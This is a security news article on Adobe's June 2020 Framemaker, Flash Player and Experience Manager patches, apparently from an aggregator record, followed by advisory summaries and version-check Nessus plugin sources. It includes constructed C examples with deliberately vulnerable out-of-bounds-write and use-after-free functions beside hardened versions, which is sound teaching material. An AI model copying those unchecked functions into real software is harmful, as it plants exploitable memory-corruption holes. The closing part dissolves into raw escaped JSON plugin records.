Adobe released patches for four critical flaws in Flash Player and in its Framemaker document processor as part of its regularly scheduled updates. The bugs, if exploited, could enable arbitrary code-execution.
In its June security updates, released Tuesday (June 9), Adobe patched critical flaws tied to three CVEs in Adobe Framemaker (advisory APSB20-32), its application for writing and editing large or complex documents.
Two of them are critical out-of-bounds write flaws ([CVE-2020-9634](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9634>), [CVE-2020-9635](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9635>)): the program writes outside the buffer it allocated, corrupting whatever sits next to it in memory, with results that are undefined and, when the attacker controls the written bytes, exploitable. Francis Provencher, working with Trend Micro’s Zero Day Initiative (ZDI advisories ZDI-20-699 and ZDI-20-700), was credited with finding these arbitrary code-execution flaws.
Dustin Childs, communications manager with Trend Micro’s ZDI, told Threatpost that an attacker can leverage both flaws to execute code in the context of the current process. They would need to entice a user to open a specially crafted file or visit a malicious page, he said.
“For CVE-2020-9634, the specific flaw exists within the parsing of GIF files,” Childs told Threatpost. “The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. For CVE-2020-9635, the specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write before the start of an allocated object.”
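The two failure modes Childs describes, shown in code as an added example (a constructed illustration, not Framemaker’s parser and not ZDI’s proof of concept): a toy decoder for a made-up GIF-like image descriptor, little-endian width and height followed by raw pixel bytes, that trusts the header and so writes past the end of its canvas, beside a version that checks every file-derived quantity before using it as a length; and a toy object table indexed by a signed value taken from the file, where checking only the upper bound still allows a write before the start of the buffer. The format, names, sizes and sample bytes are all assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed, GIF-like image descriptor (an assumption for this example, not the
 * real GIF format): 2-byte little-endian width, 2-byte little-endian height, then
 * width*height raw pixel bytes, copied into a fixed-size canvas. */
#define CANVAS_BYTES 16   /* a 4x4 canvas */

static uint32_t rd_le16(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8);
}

/* VULNERABLE: the pixel count comes straight from the file and is never compared
 * with the size of the destination, so a header claiming more pixels than the
 * canvas holds makes memcpy write past the end of the allocated object. */
size_t decode_unchecked(const uint8_t *in, size_t in_len, uint8_t *canvas) {
    if (in_len < 4) return 0;
    size_t n = rd_le16(in) * rd_le16(in + 2);   /* attacker-chosen length */
    memcpy(canvas, in + 4, n);                  /* no bound on n */
    return n;
}

/* HARDENED: each file-derived quantity is validated before it is used as a
 * length. Returns 0 on success or a negative code naming the failed check. */
int decode_checked(const uint8_t *in, size_t in_len,
                   uint8_t *canvas, size_t canvas_len, size_t *written) {
    if (in_len < 4) return -1;                    /* truncated header */
    uint32_t w = rd_le16(in), h = rd_le16(in + 2);
    if (w == 0 || h == 0) return -2;              /* degenerate image */
    uint32_t n = w * h;                           /* 65535*65535 < 2^32: no wrap */
    if (n > canvas_len) return -3;                /* would write past end of canvas */
    if (n > in_len - 4) return -4;                /* would read past end of input */
    memcpy(canvas, in + 4, n);
    *written = n;
    return 0;
}

/* Constructed inputs: a well-formed 4x4 image, and a crafted header claiming
 * 200x200 pixels (0x00C8 x 0x00C8) over the same 16 bytes of data. */
static const uint8_t GOOD_IMAGE[20] = { 0x04, 0x00, 0x04, 0x00,
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
static const uint8_t CRAFTED_IMAGE[20] = { 0xC8, 0x00, 0xC8, 0x00,
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };

/* Runs the hardened decoder over one input and returns its status code. */
int try_decode(const uint8_t *in, size_t in_len) {
    uint8_t canvas[CANVAS_BYTES] = {0};
    size_t written = 0;
    return decode_checked(in, in_len, canvas, sizeof canvas, &written);
}

/* The "write before the start" variant: a signed index read from the file. The
 * table is a constructed stand-in for the kind of object table a PDF parser keeps. */
#define TABLE_ENTRIES 8

/* VULNERABLE: only the upper bound is checked, so idx = -1 passes and the store
 * lands just before table[0]. */
int set_entry_unchecked(int32_t *table, int16_t idx, int32_t value) {
    if (idx >= TABLE_ENTRIES) return -1;
    table[idx] = value;
    return 0;
}

/* HARDENED: reject both directions before indexing. */
int set_entry_checked(int32_t *table, int16_t idx, int32_t value) {
    if (idx < 0 || idx >= TABLE_ENTRIES) return -1;
    table[idx] = value;
    return 0;
}

/* Exercises the hardened index check; returns 1 when it rejects both out-of-range
 * directions and accepts an in-range index. */
int table_demo(void) {
    int32_t table[TABLE_ENTRIES] = {0};
    int neg = set_entry_checked(table, -1, 7);
    int big = set_entry_checked(table, TABLE_ENTRIES, 7);
    int ok  = set_entry_checked(table, 3, 7);
    return neg == -1 && big == -1 && ok == 0 && table[3] == 7;
}
```

The crafted header is rejected by the canvas check (-3) before any byte is copied; feeding the same bytes to `decode_unchecked` would copy 40,000 bytes into a 16-byte canvas, which is why the vulnerable function is shown but never run on that input here. Note the order of checks in the hardened version: the destination bound is tested before the input bound, so a file that is both truncated and oversized is refused for the more dangerous reason first.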
Adobe also patched a critical memory-corruption bug (CVE-2020-9636) in which the program accesses memory after it has been freed, a use-after-free. The outcome depends on what the freed memory has since been reused for: at best a crash, at worst execution of attacker-controlled code. As with the two out-of-bounds writes, exploitation requires the victim to open a crafted file, so the result is code execution in the context of the current user rather than an unauthenticated remote attack. Honggang Ren of Fortinet’s FortiGuard Labs reported the flaw.
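Why a use-after-free ends in attacker-controlled data, shown with an added example that is not Framemaker’s code and does not touch memory the real heap has freed: a two-slot toy allocator (an assumption for the example) reproduces the reuse pattern, allocate A, free it, allocate B of the same size into A’s slot, fill B, then use the stale reference to A. Beside it, a handle that carries the slot’s generation counter turns the silent read of B’s bytes into a refused access; generation-tagged handles are a general mitigation, not Adobe’s fix for this CVE.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* A two-slot, fixed-size toy heap (an assumption for this example, not any real
 * allocator) so the reuse pattern behind a use-after-free can be shown without
 * dereferencing memory the real heap has freed. */
#define SLOTS 2

typedef struct {
    uint32_t generation;   /* bumped on every free; the hardened path checks it */
    int      in_use;
    char     payload[16];
} slot_t;

static slot_t heap[SLOTS];

/* A handle is the slot index plus the generation the slot had when issued. */
typedef struct { int idx; uint32_t gen; } handle_t;

static handle_t toy_alloc(void) {
    for (int i = 0; i < SLOTS; i++) {
        if (!heap[i].in_use) {
            heap[i].in_use = 1;
            memset(heap[i].payload, 0, sizeof heap[i].payload);
            return (handle_t){ i, heap[i].generation };
        }
    }
    return (handle_t){ -1, 0 };
}

static void toy_free(handle_t h) {
    heap[h.idx].in_use = 0;
    heap[h.idx].generation++;     /* every outstanding handle to this slot is now stale */
}

/* VULNERABLE: reads through the slot it remembered, regardless of whether the
 * object was freed and the slot handed to someone else in the meantime. */
const char *read_unchecked(handle_t stale) {
    return heap[stale.idx].payload;
}

/* HARDENED: refuses the access once the slot's generation has moved on. */
const char *read_checked(handle_t h) {
    if (h.idx < 0 || heap[h.idx].generation != h.gen) return NULL;
    return heap[h.idx].payload;
}

/* The classic sequence. Returns 1 when B landed in A's slot, the unchecked read
 * through the stale handle observed B's bytes, and the checked read refused.
 * If `observed` is non-NULL it receives what the unchecked read returned. */
int uaf_demo(char *observed, size_t observed_len) {
    memset(heap, 0, sizeof heap);
    handle_t a = toy_alloc();
    strcpy(heap[a.idx].payload, "trusted-A");
    toy_free(a);                                /* A freed; handle `a` still held */
    handle_t b = toy_alloc();                   /* same size, so it reuses A's slot */
    strcpy(heap[b.idx].payload, "ATTACKER-B");  /* constructed attacker-chosen data */
    const char *via_stale = read_unchecked(a);  /* the use after free */
    const char *guarded   = read_checked(a);    /* the hardened path */
    if (observed && observed_len) {
        strncpy(observed, via_stale, observed_len - 1);
        observed[observed_len - 1] = '\0';
    }
    return b.idx == a.idx && strcmp(via_stale, "ATTACKER-B") == 0 && guarded == NULL;
}
```

In a real heap the "payload" the stale pointer reads back is typically a vtable pointer or a length field, which is what turns a dangling read into control of execution; the toy keeps it as text so the effect is visible without undefined behaviour.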
Adobe Framemaker 2019.0.5 and earlier for Windows are affected; the fix is version 2019.0.6, which the installed product reports internally as 15.0.6 (the number version checks such as Nessus plugin 137362 key on).
## **Flash Player**
A critical use-after-free flaw ([CVE-2020-9633](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9633>)) was meanwhile patched in Flash Player (advisory APSB20-30). Affected are Adobe Flash Player Desktop Runtime (Windows, macOS and Linux), Adobe Flash Player for Google Chrome (Windows, macOS, Linux and Chrome OS) and Adobe Flash Player for Microsoft Edge and Internet Explorer 11 (Windows 10 and 8.1), all at version 32.0.0.330 and earlier.
Affected users are urged to update to 32.0.0.387. Adobe rates the release “priority 2,” which in its scheme means it “resolves vulnerabilities in a product that has historically been at elevated risk” but for which there are currently no known exploits. The same CVE is tracked by Microsoft’s ADV200010 for the Edge and Internet Explorer 11 build and by Red Hat’s RHSA-2020:2547 for its Linux plugin package.
“Successful exploitation could lead to arbitrary code-execution in the context of the current user,” said [Adobe in its update](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>).
Flash is known to be a favorite target for cyberattacks, particularly for exploit kits, [zero-day attacks](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and phishing schemes. Of note, [Adobe announced in July 2017](<https://threatpost.com/patched-flash-player-sandbox-escape-leaked-windows-credentials/127378/>) that it plans to push Flash into an end-of-life state, meaning that it will no longer update or distribute Flash Player after the end of 2020. For most environments the durable fix is therefore to remove Flash Player where it is still installed rather than to keep patching it.
## **Other Flaws**
Adobe also patched [six important-severity flaws](<https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html>) in Experience Manager (AEM), its content-management platform for building websites, mobile apps and forms (advisory APSB20-31). AEM 6.5 and earlier are affected; Tenable’s version check treats 6.1.x through 6.4.x below 6.4.8.1 and 6.5.x below 6.5.5.0 as vulnerable.
These include two server-side request forgery (SSRF) bugs ([CVE-2020-9643](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9643>) and CVE-2020-9645, the latter a blind SSRF) that could allow sensitive information disclosure, and four cross-site scripting (XSS) vulnerabilities (CVE-2020-9647, [CVE-2020-9648](<https://vulmon.com/vulnerabilitydetails?qid=CVE-2020-9648>), CVE-2020-9651 and [CVE-2020-9644](<https://attackerkb.com/topics/Xr9Uh2Tx13/cve-2020-9644>)) that could enable arbitrary JavaScript execution in a victim’s browser.
For all flaws in its June update, Adobe said it is not aware of any exploits in the wild. The regularly scheduled updates come a month after Adobe [fixed 16 critical flaws](<https://threatpost.com/adobe-kills-16-critical-flaws-in-acrobat-and-reader-digital-negative-sdk/155652/>) across its Acrobat and Reader applications and its Adobe Digital Negative (DNG) Software Development Kit in May. If exploited, those flaws could lead to remote code execution.
In May, Adobe also issued an [out-of-band patch for](<https://threatpost.com/adobe-patches-critical-rce-flaw-character-animator/155882/>) a critical flaw in Adobe Character Animator, its application for creating live motion-capture animation videos. The flaw can be exploited by a remote attacker to execute code on affected systems.
## **Article Metadata**

- Source: Threatpost, record THREATPOST:7DD942EAC02CBA0F656CD33B15174F40 (type threatpost, bulletin family info)
- Title: Adobe Warns of Critical Flaws in Flash Player, Framemaker
- Reporter: Lindsey O'Donnell
- Published and last modified: 2020-06-09T15:27:28
- URL: https://threatpost.com/adobe-warns-critical-flaws-flash-player-framemaker/156417/
- CVSS v2 carried by the record (the Flash Player score): 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C
- CVEs covered by the article: CVE-2020-9633, CVE-2020-9634, CVE-2020-9635, CVE-2020-9636, CVE-2020-9643, CVE-2020-9644, CVE-2020-9645, CVE-2020-9647, CVE-2020-9648, CVE-2020-9651. The record’s CVE list also carries CVE-2020-24400 and CVE-2020-24407, from Adobe’s October 2020 Magento bulletin APSB20-59, which the article does not discuss.
- Cross-referenced advisories and checks: Adobe APSB20-30, APSB20-31, APSB20-32 (and APSB20-59); Microsoft ADV200010; Red Hat RHSA-2020:2547 and RH:CVE-2020-9633; Ubuntu UB:CVE-2020-9633; Gentoo GLSA-202006-09; Mageia MGASA-2020-0264; FreeBSD 196B31B8-AA9A-11EA-A59A-6451062F0F7A; ZDI-20-699 and ZDI-20-700; THN:882595A940E5AB15E8B9C472154ACA45; 1337DAY-ID-36026; Nessus plugins ADOBE_EXPERIENCE_MANAGER_APSB20-31.NASL, ADOBE_FRAMEMAKER_APSB20-32.NASL, FLASH_PLAYER_APSB20-30.NASL, MACOSX_FLASH_PLAYER_APSB20-30.NASL, SMB_NT_MS20_JUN_FLASH.NASL, REDHAT-RHSA-2020-2547.NASL, GENTOO_GLSA-202006-09.NASL, FREEBSD_PKG_196B31B8AA9A11EAA59A6451062F0F7A.NASL; OpenVAS 1361412562310817149 through 1361412562310817155
- EPSS (as of 2023-03-15): CVE-2020-9633 0.0390 (percentile 0.906); CVE-2020-9634 and CVE-2020-9635 0.00594 (0.750); CVE-2020-9636 0.00373 (0.684); CVE-2020-9643 and CVE-2020-9645 0.00199 (0.561); CVE-2020-9644 0.00059 (0.227); CVE-2020-9647, CVE-2020-9648 and CVE-2020-9651 0.00086 (0.348); CVE-2020-24400 0.00063 (0.249); CVE-2020-24407 0.00085 (0.344)
## **Related Advisories**

The aggregator record indexes the following vendor bulletins and scanner checks alongside the article.

**APSB20-30 Security updates available for Adobe Flash Player** (Adobe, published 2020-06-09, https://helpx.adobe.com/security/products/flash-player/apsb20-30.html). Adobe has released security updates for Adobe Flash Player for Windows, macOS, Linux and Chrome OS. These updates address a critical vulnerability in Adobe Flash Player. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVE: CVE-2020-9633. CVSS v3.1 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H); CVSS v2 10.0 High (AV:N/AC:L/Au:N/C:C/I:C/A:C).

**APSB20-31 Security update available for Adobe Experience Manager** (Adobe, published 2020-06-09, https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html). Adobe has released updates for Adobe Experience Manager (AEM). These updates resolve vulnerabilities in AEM versions 6.5 and below rated Important. Successful exploitation could result in sensitive information disclosure. CVEs: CVE-2020-9643, CVE-2020-9644, CVE-2020-9645, CVE-2020-9647, CVE-2020-9648, CVE-2020-9651. CVSS v3.1 7.5 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N); CVSS v2 5.0 Medium (AV:N/AC:L/Au:N/C:P/I:N/A:N).

**APSB20-32 Security Updates Available for Adobe Framemaker** (Adobe, published 2020-06-09, https://helpx.adobe.com/security/products/framemaker/apsb20-32.html). Adobe has released a security update for Adobe Framemaker. This update addresses multiple critical vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. CVEs: CVE-2020-9634, CVE-2020-9635, CVE-2020-9636. CVSS v3.1 8.8 High (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H); CVSS v2 6.8 Medium (AV:N/AC:M/Au:N/C:P/I:P/A:P). The UI:R component reflects the delivery vector described above: the victim has to open a crafted file.

**APSB20-59 Security updates available for Magento** (Adobe, published 2020-10-15, https://helpx.adobe.com/security/products/magento/apsb20-59.html). Indexed with this record but not part of the June update. Magento has released updates for Magento Commerce and Magento Open Source. These updates resolve vulnerabilities rated important and critical. Successful exploitation could lead to arbitrary code execution. CVEs: CVE-2020-24400 through CVE-2020-24408. CVSS v3.1 9.1 Critical (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H); CVSS v2 9.0 High (AV:N/AC:L/Au:S/C:C/I:C/A:C).

**Nessus plugin 137367, ADOBE_EXPERIENCE_MANAGER_APSB20-31.NASL** (Tenable, published 2020-06-12, modified 2020-09-15, https://www.tenable.com/plugins/nessus/137367; CPE cpe:/a:adobe:experience_manager; IAVA 2020-A-0253-S). Title: Adobe Experience Manager 6.1.x < 6.4.8.1 / 6.5.x < 6.5.5.0 (APSB20-31). The check is version-based only: it reads the self-reported AEM version over HTTP (default ports 4502 and/or 4503, web-console credentials required) and compares it against two branch constraints. Plugin source:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(137367);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/09/15");

  script_cve_id(
    "CVE-2020-9643",
    "CVE-2020-9644",
    "CVE-2020-9645",
    "CVE-2020-9647",
    "CVE-2020-9648",
    "CVE-2020-9651"
  );
  script_xref(name:"IAVA", value:"2020-A-0253-S");

  script_name(english:"Adobe Experience Manager 6.1.x < 6.4.8.1 / 6.5.x < 6.5.5.0 (APSB20-31)");

  script_set_attribute(attribute:"synopsis", value:
"The Adobe Experience Manager installed on the remote host is affected by multiple vulnerabilities (APSB20-31)");
  script_set_attribute(attribute:"description", value:
"The version of Adobe Experience Manager installed on the remote host is 6.1.x, 6.2.x, 6.3.x, 6.4.x prior to 6.4.8.1,
or 6.5.x prior to 6.5.5.0. It is, therefore, affected by multiple vulnerabilities:

  - An unspecified server-side request forgery (SSRF) that
    could result in sensitive information disclosure
    (CVE-2020-9643)

  - An unspecified cross-site scripting vulnerability that
    could result in arbitrary javaScript execution
    (CVE-2020-9644, CVE-2020-9647, CVE-2020-9648, CVE-2020-9651)

  - An unspecified blind server-side request forgery that
    could result sensitive information disclosure
    (CVE-2020-9645)

Note that Nessus has not tested for these issues but has instead relied only on the application's self-reported version
number. To retrieve patch level information, this plugin requires the HTTP credentials of the web console. For accurate
results, you may need to enable the Adobe Experience Manager ports (by default, 4502 and/or 4503) in your Nessus
scan.");
  # https://helpx.adobe.com/security/products/experience-manager/apsb20-31.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?22dc4755");
  script_set_attribute(attribute:"solution", value:
"Apply the recommended update from the vendor advisory.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-9643");

  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");

  script_set_attribute(attribute:"vuln_publication_date", value:"2020/06/09");
  script_set_attribute(attribute:"patch_publication_date", value:"2020/06/09");
  script_set_attribute(attribute:"plugin_publication_date", value:"2020/06/12");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:experience_manager");
  script_set_attribute(attribute:"stig_severity", value:"I");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("adobe_experience_manager_http_detect.nbin");
  script_require_keys("installed_sw/Adobe Experience Manager");
  script_require_ports("Services/www", 4502, 4503);

  exit(0);
}

include('vcf.inc');
include('http.inc');

port = get_http_port(default:4502);

app_info = vcf::get_app_info(app:'Adobe Experience Manager', port:port);

vcf::check_granularity(app_info:app_info, sig_segments:2);

constraints = [
  { 'min_version' : '6.1', 'fixed_version' : '6.4.8.1'},
  { 'min_version' : '6.5', 'fixed_version' : '6.5.5.0'}
];

vcf::check_version_and_report(
  app_info:app_info,
  constraints:constraints,
  severity:SECURITY_WARNING
);
```

**Nessus plugin 137362, ADOBE_FRAMEMAKER_APSB20-32.NASL** (Tenable, published 2020-06-11, modified 2020-09-11, https://www.tenable.com/plugins/nessus/137362; CPE cpe:/a:adobe:framemaker; IAVB 2020-B-0032-S). Title: Adobe FrameMaker < 15.0.6 (aka 2019.0.6) Multiple Vulnerabilities (APSB20-32). Description as published: the version of Adobe FrameMaker installed on the remote Windows host is prior to 15.0.6 and is therefore affected by an unspecified memory corruption error that allows arbitrary code execution (CVE-2020-9634) and an unspecified out-of-bounds error that allows arbitrary code execution (CVE-2020-9635, CVE-2020-9636). Note that this plugin text assigns bug classes to the three CVEs differently from the ZDI analysis quoted above; the version check itself does not depend on that mapping. The record carries only the opening of the plugin source:

```nasl
#
# (C) Tenable Network Security, Inc.
#

include('compat.inc');

if (description)
{
  script_id(137362);
  script_version("1.3");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/09/11");

  script_cve_id("CVE-2020-9634", "CVE-2020-9635", "CVE-2020-9636");
  script_xref(name:"IAVB", value:"2020-B-0032-S");

  script_name(english:"Adobe FrameMaker < 15.0.6 (aka 2019.0.6) Multiple Vulnerabilities (APSB20-32)");

  script_set_attribute(attribute:"synopsis", value:
"The remote install of Adobe FrameMaker has Multiple Vulnerabilities (APSB20-32).");
  script_set_attribute(attribute:"description", value:
"The version of Adobe FrameMaker installed on the remote Windows host
is prior to 15.0.6 . It is, therefore, affected by a the following
vulnerabilities :

  - An unspecified memory corruption error exists that allows
    arbitrary code execution (CVE-2020-9634)

  - An unspecified out of bounds error exists that allows
    arbitrary code execution.
```
(CVE-2020-9635, CVE-2020-9636)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/framemaker/apsb20-32.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe FrameMaker 15.0.6 (aka 2019.0.6) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9636\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:framemaker\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_framemaker_installed.nbin\");\n script_require_keys(\"installed_sw/Adobe FrameMaker\", \"SMB/Registry/Enumerated\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\napp_info = vcf::get_app_info(app:\"Adobe FrameMaker\", win_local:TRUE);\n\n# fixed is 15.0.6 (aka 2019.0.6)\nconstraints = [{\"fixed_version\":\"15.0.6\", \"fixed_display\":\"15.0.6 (aka 2019.0.6)\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:32:14", "description": "The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version 32.0.0.371. It is therefore affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player for Mac <= 32.0.0.371 (APSB20-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "MACOSX_FLASH_PLAYER_APSB20-30.NASL", "href": "https://www.tenable.com/plugins/nessus/137252", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137252);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"Adobe Flash Player for Mac <= 32.0.0.371 (APSB20-30)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote macOS or Mac OSX host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote macOS or Mac OS X host is equal or prior to version\n32.0.0.371. It is therefore affected by an use after free vulnerability. An unauthenticated, remote attacker can exploit\nthis, via a specially crafted file, to execute arbitrary code within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 32.0.0.387 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_flash_player_installed.nasl\");\n script_require_keys(\"MacOSX/Flash_Player/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"MacOSX/Flash_Player/Version\");\npath = get_kb_item_or_exit(\"MacOSX/Flash_Player/Path\");\n\ncutoff_version = \"32.0.0.371\";\nfix = \"32.0.0.387\";\n# We're checking for versions less than or equal to the cutoff!\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Flash Player for Mac\", version, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:59", "description": "The remote host is affected by the vulnerability described in GLSA-202006-09 (Adobe Flash Player: Arbitrary code execution)\n\n An unspecified flaw has been discovered in Adobe Flash Player.\n Impact :\n\n This flaw can be exploited by attackers for remote code execution.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2020-06-17T00:00:00", "type": "nessus", "title": "GLSA-202006-09 : Adobe Flash Player: Arbitrary code execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-10-16T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-202006-09.NASL", "href": "https://www.tenable.com/plugins/nessus/137446", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202006-09.\n#\n# The advisory text is Copyright (C) 2001-2020 Gentoo Foundation, 
Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137446);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/16\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"GLSA\", value:\"202006-09\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"GLSA-202006-09 : Adobe Flash Player: Arbitrary code execution\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202006-09\n(Adobe Flash Player: Arbitrary code execution)\n\n An unspecified flaw has been discovered in Adobe Flash Player.\n \nImpact :\n\n This flaw can be exploited by attackers for remote code execution.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/202006-09\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n 